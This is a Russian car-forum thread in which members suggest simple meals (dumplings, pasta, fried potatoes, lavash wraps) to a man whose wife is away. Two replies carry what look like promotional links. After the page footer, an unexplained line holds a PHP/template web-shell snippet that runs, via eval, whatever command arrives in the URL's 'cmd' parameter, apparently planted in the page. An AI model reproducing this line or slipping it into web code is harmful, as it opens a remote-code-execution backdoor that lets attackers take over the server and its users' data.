+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Простые блюда


  1. #1
    Мимо проходил Veron is on a distinguished road Аватар для Veron
    Регистрация
    26.12.2018
    Откуда
    РФ
    Машина
    Гольф
    Сообщений
    47

    Простые блюда

    Привет из Ногинска. Слушайте, нужна помощь. Жена в командировку уехала, а я тут голову ломаю - что приготовить можно простое? А то я вообще с кухней не знаком. Подкиньте идей, а, как с голоду не помереть?

  2. #2
    Мимо проходил Medved is on a distinguished road Аватар для Medved
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Гольф
    Сообщений
    42
    Ну если на уровне - как не умереть - то это просто. Пельмени всегда сварить можно, яйца пожарить. Да просто макароны с сосисками отварить - с таким ведь любой, наверно, справится?

  3. #3
    Мимо проходил Filipp is on a distinguished road Аватар для Filipp
    Регистрация
    27.12.2018
    Откуда
    .
    Машина
    VW
    Сообщений
    73
    да мне кажется, что простенькие блюда любой сможет приготовить. Ну вот элементарно картошку пожарить. Или еще проще - в духовке запечь. Ну и котлеты подарить - тоже проблем нет. Ну а если уж совсем лень со всем этим связываться, то всегда можно те же роллы, например, заказать: https://noginsk.il-tokio.ru/menu/klassicheskie

  4. #4
    Мимо проходил Milana is on a distinguished road Аватар для Milana
    Регистрация
    27.12.2018
    Откуда
    -
    Машина
    Гольф 5
    Сообщений
    16
    Смотрите. Самое простое - берете в магазине тонкий лаваш, сыр, колбасу и помидоры. Все это режете, заворачиваете в лаваш и в духовку или сковороду на 10-15 минут - вот вам сытный и простой обед!

  5. #5
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Если есть навыки в приготовлении еды, то вам будет очень легко. Даже приготовить тот же суп, или макароны с мясом, да и с салатами проблем не будет. А если не знаете, что приготовить, или же какие нужны ингредиенты для какого-либо блюда, то вам поможет этот сайт https://edadoma.net/ . Думаю, справитесь, голодным не будете ходить.)

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}